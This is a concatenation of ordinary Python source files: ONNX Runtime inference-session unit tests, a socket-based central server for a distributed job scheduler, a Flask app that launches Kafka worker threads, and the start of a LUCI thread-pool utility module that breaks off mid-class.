self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
self.assertEqual('', modelmeta.graph_description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
lines_len = len(lines)
self.assertTrue(lines_len > 8)
self.assertTrue('[' in lines[0])
for i in range(1, lines_len-1):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[-1])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be all optimizations optimization
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalide_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), so, ['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
#Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if (not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, set the CUDA EP do_copy_in_default_stream option to False
providers = [("CUDAExecutionProvider", {"do_copy_in_default_stream": True}), "CPUExecutionProvider"]
session = onnxrt.InferenceSession(get_name("issue4829.onnx"), providers=providers)
shape = np.array([2,2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=['output'], input_feed={'shape': shape})
def testSharedAllocatorUsingCreateAndRegisterAllocator(self):
# Create and register an arena based allocator
# ort_arena_cfg = onnxrt.OrtArenaCfg(0, -1, -1, -1) (create an OrtArenaCfg like this template if you want to use non-default parameters)
ort_memory_info = onnxrt.OrtMemoryInfo("Cpu", onnxrt.OrtAllocatorType.ORT_ARENA_ALLOCATOR, 0, onnxrt.OrtMemType.DEFAULT)
# Use this option if using non-default OrtArenaCfg : onnxrt.create_and_register_allocator(ort_memory_info, ort_arena_cfg)
onnxrt.create_and_register_allocator(ort_memory_info, None)
# Create a session that will use the registered arena based allocator
so1 = onnxrt.SessionOptions()
so1.log_severity_level = 1
so1.add_session_config_entry("session.use_env_allocators", "1");
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so1)
# Create a session that will NOT use the registered arena based allocator
so2 = onnxrt.SessionOptions()
so2.log_severity_level = 1
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so2)
def testCheckAndNormalizeProviderArgs(self):
from onnxruntime.capi.onnxruntime_inference_collection import check_and_normalize_provider_args
valid_providers = ["a", "b", "c"]
def check_success(providers, provider_options, expected_providers, expected_provider_options):
actual_providers, actual_provider_options = check_and_normalize_provider_args(
providers, provider_options, valid_providers)
self.assertEqual(actual_providers, expected_providers)
self.assertEqual(actual_provider_options, expected_provider_options)
check_success(None, None, [], [])
check_success(["a"], None, ["a"], [{}])
check_success(["a", "b"], None, ["a", "b"], [{}, {}])
check_success([("a", {1: 2}), "b"], None, ["a", "b"], [{"1": "2"}, {}])
check_success(["a", "b"], [{1: 2}, {}], ["a", "b"], [{"1": "2"}, {}])
with self.assertWarns(UserWarning):
check_success(["a", "b", "a"], [{"x": 1}, {}, {"y": 2}], ["a", "b"], [{"x": "1"}, {}])
def check_failure(providers, provider_options):
with self.assertRaises(ValueError):
check_and_normalize_provider_args(providers, provider_options, valid_providers)
# disable this test
# provider not valid
#check_failure(["d"], None)
# providers not sequence
check_failure(3, None)
# providers value invalid
check_failure([3], None)
# provider_options not sequence
check_failure(["a"], 3)
# provider_options value invalid
check_failure(["a"], ["not dict"])
# providers and provider_options length mismatch
check_failure(["a", "b"], [{1: 2}])
# provider options unsupported mixed specification
check_failure([("a", {1: 2})], [{3: 4}])
def testRegisterCustomEPsLibrary(self):
# exclude for macos and linux
if not sys.platform.startswith("win"):
return
shared_library = 'test_execution_provider.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_execution_provider_library", "test_model.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
from onnxruntime.capi import _pybind_state as C
session_options = C.get_default_session_options()
sess = C.InferenceSession(session_options, custom_op_model, True, True)
sess.initialize_session(['my_ep'],
[{'shared_lib_path': shared_library,
'device_id':'1', 'some_config':'val'}],
set())
print("Create session with customize execution provider successfully!")
if __name__ == '__main__':
unittest.main()
|
__main__.py | """Script to set up and run central server.
Responsible for communication with computing nodes, primary backup, job
scheduling, load balancing, job-node matchmaking decisions etc.
Messages received from the node:
- JOB_SUBMIT: The node sends the job to be submitted for execution
in this message along with the executable file. The server tries to
schedule the job if possible, else adds it to the job queue.
- HEARTBEAT: The server(main) receives the cpu-time and memory of the
node through this heartbeat and also detects that the node is alive.
It responds with a heartbeat message of its own through a child
process.
- EXECUTED_JOB: This message tells the server that the job given to the
node has either been completed or preempted(with the help of a
completed flag). If the job has been completed, the server removes
it from the job_queue and informs the node which has submitted the
job. Also, it tries to schedule the jobs in the job queue. On the
other hand, if the job is a preempted one, the server tries to
schedule it again.
- ACK_SUBMITTED_JOB_COMPLETION: The server ignores this.
- ACK_JOB_EXEC: The server ignores this.
- ACK_JOB_EXEC_PREEMPT: The server ignores this.
Messages received from backup:
- HEARTBEAT: Just tells the node that the backup is alive. The serves
responds with its own heartbeat message in response to this.
Messages received from its own child process:
- NODE_CRASH: The server main receives it from a child process after it
a node or a set of nodes has crashed. The server tries to schedule
jobs running on those nodes somewhere else.
Messages sent to node:
- HEARTBEAT: Server sends this message in response to HEARTBEAT message
by node. A delay has been set in the server's response, so that
heartbeat messages do not congest the network.
- ACK_JOB_SUBMIT: Server sends this message on receiving a JOB_SUBMIT
message from the node. Includes job's submission id in
message's content field.
- ACK_EXECUTED_JOB: Sent in response to EXECUTED_JOB message.
- JOB_EXEC: Sent by server requesting execution of a job on the node.
Has job object in content, and executable in file field.
- JOB_PREEMPT_EXEC: Sent by server requesting preemption of an executing
job, and execution of a new job. Has (new_job,
job_to_preempt receipt id) in content, and executable file of new
job in file.
- SUBMITTED_JOB_COMPLETION: Server, on receiving EXECUTED_JOB message
from a node, checks job's 'completed' attribute, and if True,
sends SUBMITTED_JOB_COMPLETION to submitting node.
Messages sent to backup:
- BACKUP_UPDATE: Sent whenever server state data structures are updated.
Contains latest ServerState.
- HEARTBEAT: This is sent in response to the heartbeat of the backup.
This is used by the backup to detect server crash and take over.
"""
import argparse
import multiprocessing as mp
import os
import os.path
import pickle
import select
import socket
import time
from . import message_handlers
from ..messaging import message
from ..messaging import messageutils
from ..utils import priorityqueue
SERVER_SEND_PORT = 5005
SERVER_RECV_PORT = 5006
BUFFER_SIZE = 1048576
CRASH_ASSUMPTION_TIME = 20 # seconds
CRASH_DETECTOR_SLEEP_TIME = 5 # seconds
SERVER_START_WAIT_TIME = 5 # seconds
BACKUP_SERVER_STATE_PATH = './backup_state.pkl'
PROMPT_WELCOME_FILENAME = '/prompt_welcome'
def print_welcome_message():
"""Print a welcome message read from prompt_welcome file to stdout."""
prompt_welcome_filepath = \
os.path.dirname(os.path.realpath(__file__)) + PROMPT_WELCOME_FILENAME
with open(prompt_welcome_filepath, 'r') as file:
print(file.read())
def detect_node_crash(node_last_seen, server_ip):
"""Detects node crashes.
Run as a child process, periodically checking last heartbeat times for each
computing node.
:param node_last_seen: Dictionary with time when last heartbeat was
received from node {node_id: last_seen_time}
:param server_ip: String with IP address of server (this node).
"""
while True:
time.sleep(CRASH_DETECTOR_SLEEP_TIME)
print('CHECKING CRASH')
current_time = time.time()
crashed_nodes = set()
for node_id, last_seen_time in node_last_seen.items():
time_since_last_heartbeat = current_time - last_seen_time
if time_since_last_heartbeat > CRASH_ASSUMPTION_TIME:
crashed_nodes.add(node_id)
# Make and send a crash message to main process which is listening
# on SERVER_RECV_PORT for incoming messages.
if len(crashed_nodes) != 0:
print('NODE CRASHED')
print(crashed_nodes)
messageutils.make_and_send_message(msg_type='NODE_CRASH',
content=crashed_nodes,
file_path=None,
to=server_ip,
msg_socket=None,
port=SERVER_RECV_PORT)
def main():
"""Get server ip, backup ip, listen for messages and manage jobs.
"""
parser = argparse.ArgumentParser(description='Set up central server.')
parser.add_argument(
'--server-ip',
required=True,
help='IP address of central server (this node).')
parser.add_argument(
'--backup-ip',
required=True,
help='IP address of primary backup server.')
args = parser.parse_args()
backup_ip = args.backup_ip
server_ip = args.server_ip
print_welcome_message()
compute_nodes = {} # {node_id: status}
job_queue = priorityqueue.JobQueue()
running_jobs = {} # {node_id: [list of jobs]}
job_executable = {} # {job_id: executable}
job_sender = {} # {job_id: sender}
# In case of backup server taking over on original central server crash
# gives backup process enough time to terminate
time.sleep(SERVER_START_WAIT_TIME)
job_receipt_id = 0 # Unique ID assigned to each job from server.
server_state_order = 0 # Sequence ordering of ServerState sent to backup.
manager = mp.Manager()
node_last_seen = manager.dict() # {node_id: last_seen_time}
# Initialize current server state from backup snapshot
# Used in case primary backup is taking over as central server
if os.path.isfile(BACKUP_SERVER_STATE_PATH):
with open(BACKUP_SERVER_STATE_PATH, 'rb') as backup_server_state:
server_state = pickle.load(backup_server_state)
compute_nodes = server_state.compute_nodes
for node_id, _ in compute_nodes.items():
node_last_seen[node_id] = time.time()
running_jobs = server_state.running_jobs
job_receipt_id = server_state.job_receipt_id
job_sender = server_state.job_sender
job_executable = server_state.job_executable
job_queue = priorityqueue.JobQueue()
for job in server_state.job_queue:
job_queue.put(job)
process_crash_detector = mp.Process(
target=detect_node_crash, args=(node_last_seen, server_ip,))
process_crash_detector.start()
# Creates a TCP/IP socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Binds the socket to the port
server_address = ('', SERVER_RECV_PORT)
print('Starting up on %s port %s' % server_address)
server.bind(server_address)
server.listen(5)
# Sockets for reading and writing
inputs = [server]
outputs = []
while inputs:
# Wait for at least one of the sockets to be ready for processing
readable, _, _ = select.select(inputs, outputs, inputs)
# Handle inputs
for msg_socket in readable:
if msg_socket is server:
# A "readable" server socket is ready to accept a connection
connection, client_address = msg_socket.accept()
inputs.append(connection)
else:
data = msg_socket.recv(BUFFER_SIZE)
if data:
data_list = []
while data:
data_list.append(data)
data = msg_socket.recv(BUFFER_SIZE)
data = b''.join(data_list)
msg = pickle.loads(data)
assert isinstance(msg, message.Message), \
"Received object on socket not of type Message."
print(msg)
if msg.msg_type == 'HEARTBEAT':
if msg.sender == backup_ip:
message_handlers.heartbeat_from_backup_handler(
received_msg=msg)
else:
message_handlers.heartbeat_handler(
compute_nodes=compute_nodes,
node_last_seen=node_last_seen,
running_jobs=running_jobs,
job_queue=job_queue,
job_sender=job_sender,
job_executable=job_executable,
job_receipt_id=job_receipt_id,
backup_ip=backup_ip,
server_state_order=server_state_order,
received_msg=msg)
elif msg.msg_type == 'JOB_SUBMIT':
job_receipt_id += 1
server_state_order += 1
message_handlers.job_submit_handler(
job_queue=job_queue,
compute_nodes=compute_nodes,
running_jobs=running_jobs,
job_sender=job_sender,
job_executable=job_executable,
received_msg=msg,
job_receipt_id=job_receipt_id,
backup_ip=backup_ip,
server_state_order=server_state_order)
elif msg.msg_type == 'EXECUTED_JOB':
server_state_order += 1
print(
'RECV: ' + str(msg.content) + ' ' +
str(msg.content.completed))
job_queue = message_handlers.executed_job_handler(
job_queue=job_queue,
compute_nodes=compute_nodes,
job_receipt_id=job_receipt_id,
running_jobs=running_jobs,
job_sender=job_sender,
job_executable=job_executable,
backup_ip=backup_ip,
server_state_order=server_state_order,
received_msg=msg)
elif msg.msg_type == 'ACK_JOB_EXEC':
message_handlers.ack_ignore_handler()
elif msg.msg_type == 'ACK_JOB_EXEC_PREEMPT':
message_handlers.ack_ignore_handler()
elif msg.msg_type == 'ACK_SUBMITTED_JOB_COMPLETION':
message_handlers.ack_ignore_handler()
elif msg.msg_type == 'NODE_CRASH':
message_handlers.node_crash_handler(
received_msg=msg,
compute_nodes=compute_nodes,
running_jobs=running_jobs,
job_queue=job_queue,
node_last_seen=node_last_seen,
job_executable=job_executable)
else:
inputs.remove(msg_socket)
msg_socket.close()
if __name__ == '__main__':
main()
|
app.py | from src.kafka_module.kf_service import process_layout_detector_kf, layout_detector_request_worker
from anuvaad_auditor.loghandler import log_info
from anuvaad_auditor.loghandler import log_error
from flask import Flask
from flask.blueprints import Blueprint
from flask_cors import CORS
from src import routes
import config
import torch
import threading
import time
from src.utilities.app_context import LOG_WITHOUT_CONTEXT
merge_app = Flask(__name__)
def start_kafka():
try:
t1 = threading.Thread(target=process_layout_detector_kf, name='layout-detector-consumer-thread')
t1.start()
log_info("multithread Kafka running on multithread", LOG_WITHOUT_CONTEXT)
t2 = threading.Thread(target=layout_detector_request_worker, name='layout_detector-worker-thread')
t2.start()
log_info("Starting layout_detector_request_worker", LOG_WITHOUT_CONTEXT)
except Exception as e:
log_error("threading ERROR WHILE RUNNING CUSTOM THREADS ", LOG_WITHOUT_CONTEXT, e)
if config.ENABLE_CORS:
cors = CORS(merge_app, resources={r"/api/*": {"origins": "*"}})
for blueprint in vars(routes).values():
if isinstance(blueprint, Blueprint):
merge_app.register_blueprint(blueprint, url_prefix=config.API_URL_PREFIX)
if __name__ == "__main__":
start_kafka()
print(merge_app.url_map)
merge_app.run(host=config.HOST, port=config.PORT, debug=config.DEBUG)
|
threading_utils.py | # Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Classes and functions related to threading."""
import functools
import inspect
import logging
import os
import sys
import threading
import time
import traceback
from utils import tools
tools.force_local_third_party()
# third_party/
import six
from six.moves import queue as Queue
# Priorities for tasks in AutoRetryThreadPool, particular values are important.
PRIORITY_HIGH = 1 << 8
PRIORITY_MED = 2 << 8
PRIORITY_LOW = 3 << 8
class LockWithAssert(object):
"""Wrapper around (non recursive) Lock that tracks its owner."""
def __init__(self):
self._lock = threading.Lock()
self._owner = None
def __enter__(self):
self._lock.acquire()
assert self._owner is None
self._owner = threading.current_thread()
def __exit__(self, _exc_type, _exec_value, _traceback):
self.assert_locked('Releasing unowned lock')
self._owner = None
self._lock.release()
return False
def assert_locked(self, msg=None):
"""Asserts the lock is owned by running thread."""
assert self._owner == threading.current_thread(), msg
class ThreadPoolError(Exception):
"""Base class for exceptions raised by ThreadPool."""
pass
class ThreadPoolEmpty(ThreadPoolError):
"""Trying to get task result from a thread pool with no pending tasks."""
pass
class ThreadPoolClosed(ThreadPoolError):
"""Trying to do something with a closed thread pool."""
pass
class ThreadPool(object):
"""Multithreaded worker pool with priority support.
When the priority of tasks match, it works in strict FIFO mode.
"""
QUEUE_CLASS = Queue.PriorityQueue
def __init__(self, initial_threads, max_threads, queue_size, prefix=None):
"""Immediately starts |initial_threads| threads.
Arguments:
initial_threads: Number of threads to start immediately. Can be 0 if it is
uncertain that threads will be needed.
max_threads: Maximum number of threads that will be started when all the
threads are busy working. Often the number of CPU cores.
queue_size: Maximum number of tasks to buffer in the queue. 0 for
unlimited queue. A non-zero value may make add_task()
blocking.
prefix: Prefix to use for thread names. Pool's threads will be
named '<prefix>-<thread index>'.
"""
prefix = prefix or 'tp-0x%0x' % id(self)
logging.debug(
'New ThreadPool(%d, %d, %d): %s', initial_threads, max_threads,
queue_size, prefix)
assert initial_threads <= max_threads
assert max_threads <= 1024
self.tasks = self.QUEUE_CLASS(queue_size)
self._max_threads = max_threads
self._prefix = prefix
# Used to assign indexes to tasks.
self._num_of_added_tasks_lock = threading.Lock()
self._num_of_added_tasks = 0
# Lock that protected everything below (including conditional variable).
self._lock = threading.Lock()
# Condition 'bool(_outputs) or bool(_exceptions) or _pending_count == 0'.
self._outputs_exceptions_cond = threading.Condition(self._lock)
self._outputs = []
self._exceptions = []
# Number of pending tasks (queued or being processed now).
self._pending_count = 0
# List of threads.
self._workers = []
# Number of threads that are waiting for new tasks.
self._ready = 0
# Number of threads already added to _workers, but not yet running the loop.
self._starting = 0
# True if close was called. Forbids adding new tasks.
self._is_closed = False
for _ in range(initial_threads):
self._add_worker()
def _add_worker(self):
"""Adds one worker thread if there isn't too many. Thread-safe."""
with self._lock:
if len(self._workers) >= self._max_threads or self._is_closed:
return False
worker = threading.Thread(
name='%s-%d' % (self._prefix, len(self._workers)), target=self._run)
self._workers.append(worker)
self._starting += 1
logging.debug('Starting worker thread %s', worker.name)
worker.daemon = True
worker.start()
return True
def add_task(self, priority, func, *args, **kwargs):
"""Adds a task, a function to be executed by a worker.
Arguments:
- priority: priority of the task versus others. Lower priority takes
precedence.
- func: function to run. Can either return a return value to be added to the
output list or be a generator which can emit multiple values.
- args and kwargs: arguments to |func|. Note that if func mutates |args| or
|kwargs| and that the task is retried, see
AutoRetryThreadPool, the retry will use the mutated
values.
Returns:
Index of the item added, e.g. the total number of enqueued items up to
now.
"""
assert isinstance(priority, int)
assert callable(func)
with self._lock:
if self._is_closed:
raise ThreadPoolClosed('Can not add a task to a closed ThreadPool')
start_new_worker = (
# Pending task count plus new task > number of available workers.
self.tasks.qsize() + 1 > self._ready + self._starting and
# Enough slots.
len(self._workers) < self._max_threads
)
self._pending_count += 1
with self._num_of_added_tasks_lock:
self._num_of_added_tasks += 1
index = self._num_of_added_tasks
self.tasks.put((priority, index, func, args, kwargs))
if start_new_worker:
self._add_worker()
return index
def _run(self):
"""Worker thread loop. Runs until a None task is queued."""
# Thread has started, adjust counters.
with self._lock:
self._starting -= 1
self._ready += 1
while True:
try:
task = self.tasks.get()
finally:
with self._lock:
self._ready -= 1
try:
if task is None:
# We're done.
return
_priority, _index, func, args, kwargs = task
if inspect.isgeneratorfunction(func):
for out in func(*args, **kwargs):
self._output_append(out)
else:
out = func(*args, **kwargs)
self._output_append(out)
except Exception as e:
logging.warning('Caught exception: %s', e)
exc_info = sys.exc_info()
logging.info(''.join(traceback.format_tb(exc_info[2])))
with self._outputs_exceptions_cond:
self._exceptions.append(exc_info)
self._outputs_exceptions_cond.notifyAll()
finally:
try:
# Mark thread as ready again, mark task as processed. Do it before
# waking up threads waiting on self.tasks.join(). Otherwise they might
# find ThreadPool still 'busy' and perform unnecessary wait on CV.
with self._outputs_exceptions_cond:
self._ready += 1
self._pending_count -= 1
if self._pending_count == 0:
self._outputs_exceptions_cond.notifyAll()
self.tasks.task_done()
except Exception as e:
# We need to catch and log this error here because this is the root
# function for the thread, nothing higher will catch the error.
logging.exception('Caught exception while marking task as done: %s',
e)
def _output_append(self, out):
if out is not None:
with self._outputs_exceptions_cond:
self._outputs.append(out)
self._outputs_exceptions_cond.notifyAll()
def join(self):
"""Extracts all the results from each threads unordered.
Call repeatedly to extract all the exceptions if desired.
Note: will wait for all work items to be done before returning an exception.
To get an exception early, use get_one_result().
"""
# TODO(maruel): Stop waiting as soon as an exception is caught.
self.tasks.join()
with self._outputs_exceptions_cond:
if self._exceptions:
e = self._exceptions.pop(0)
six.reraise(e[0], e[1], e[2])
out = self._outputs
self._outputs = []
return out
def get_one_result(self):
